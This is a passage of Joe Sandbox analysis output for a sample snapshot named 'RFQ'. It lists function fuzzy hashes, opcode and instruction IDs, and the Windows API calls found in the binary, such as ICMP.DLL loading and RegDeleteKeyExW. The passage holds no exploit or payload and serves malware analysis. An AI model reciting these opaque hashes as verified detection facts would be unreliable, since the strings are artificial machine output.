                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                          • String ID: \VH
                                                                          • API String ID: 1682464887-234962358
                                                                          • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                          • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                          • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                          • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                          • String ID: \VH
                                                                          • API String ID: 1682464887-234962358
                                                                          • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                          • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                          • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                          • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                          • String ID: \VH
                                                                          • API String ID: 1682464887-234962358
                                                                          • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                          • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                          • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                          • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume
                                                                          • String ID: \VH
                                                                          • API String ID: 2507767853-234962358
                                                                          • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                          • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                          • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                          • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume
                                                                          • String ID: \VH
                                                                          • API String ID: 2507767853-234962358
                                                                          • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                          • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                          • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                          • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                          • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: msctls_trackbar32
                                                                          • API String ID: 3850602802-1010561917
                                                                          • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                          • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                          • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                          • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                          • String ID: crts
                                                                          • API String ID: 943502515-3724388283
                                                                          • Opcode ID: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                                          • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                          • Opcode Fuzzy Hash: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                                          • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                          • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                          • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$LabelVolume
                                                                          • String ID: \VH
                                                                          • API String ID: 2006950084-234962358
                                                                          • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                          • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                          • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                          • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetMenuItemInfoW.USER32 ref: 00449727
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                          • DrawMenuBar.USER32 ref: 00449761
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$InfoItem$Draw_malloc
                                                                          • String ID: 0
                                                                          • API String ID: 772068139-4108050209
                                                                          • Opcode ID: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                                          • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                          • Opcode Fuzzy Hash: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                                          • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcscpy
                                                                          • String ID: 3, 3, 8, 1
                                                                          • API String ID: 3469035223-357260408
                                                                          • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                          • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                          • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                          • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: ICMP.DLL$IcmpCloseHandle
                                                                          • API String ID: 2574300362-3530519716
                                                                          • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                          • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                          • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                          • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: ICMP.DLL$IcmpCreateFile
                                                                          • API String ID: 2574300362-275556492
                                                                          • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                          • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                          • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                          • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: ICMP.DLL$IcmpSendEcho
                                                                          • API String ID: 2574300362-58917771
                                                                          • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                          • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                          • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                          • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                          • API String ID: 2574300362-4033151799
                                                                          • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                          • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                          • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                          • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                          • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                          • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                          • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                          • VariantClear.OLEAUT32(?), ref: 00479650
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                          • String ID:
                                                                          • API String ID: 2808897238-0
                                                                          • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                          • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                          • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                          • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                          • __itow.LIBCMT ref: 004699CD
                                                                            • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                          • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                          • __itow.LIBCMT ref: 00469A97
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
